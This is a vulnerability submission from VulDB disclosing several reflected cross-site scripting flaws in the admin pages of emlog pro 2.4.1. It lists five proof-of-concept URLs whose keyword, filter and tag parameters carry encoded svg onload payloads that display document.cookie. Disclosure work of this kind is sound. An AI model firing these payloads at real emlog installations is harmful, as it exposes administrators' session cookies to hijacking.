Enviar #462465: emlog emlog pro 2.4.1 Cross-Site Scripting (XSS)información

Títuloemlog emlog pro 2.4.1 Cross-Site Scripting (XSS)
DescripciónMultiple Reflected Cross-Site Scripting (XSS) Vulnerabilities in emlog pro 2.4.1 Summary emlog pro 2.4.1 is affected by multiple reflected Cross-Site Scripting (XSS) vulnerabilities. These vulnerabilities occur due to insufficient input validation and sanitation, allowing attackers to inject malicious scripts into web pages that are then executed in the browsers of other users. Details This is the affected php file: /admin/tag.php /admin/user.php /admin/plugin.php /admin/store.php The vulnerabilities exist due to the improper handling of some parameters. These parameters are directly concatenated into the HTML output without proper sanitization, allowing an attacker to inject arbitrary JavaScript code. POC For each of the identified endpoints, an attacker can exploit the vulnerability by injecting a malicious script via the respective parameter. Below are the URLs with crafted payloads that demonstrate the reflected XSS: http://target-ip/admin/tag.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/user.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/plugin.php?filter=1%22%3E%3C/script%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/store.php?tag=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E http://target-ip/admin/store.php?keyword=1%22%3E%3Csvg%20onload=alert(document.cookie)%3E Impact If a administrator accesses the malicious url, the cookie may be obtained by an attacker.
Fuente⚠️ https://github.com/emlog/emlog/issues/305
Usuario
 jiashenghe (UID 39445)
Sumisión2024-12-13 03:58 (hace 2 años)
Moderación2024-12-20 13:36 (7 days later)
EstadoAceptado
Entrada de VulDB289080 [Emlog Pro hasta 2.4.1 /admin/store.php día secuencias de comandos en sitios cruzados]
Puntos20

AnteriorVisión De ConjuntoPróximo

Want to know what is going to be exploited?

We predict KEV entries!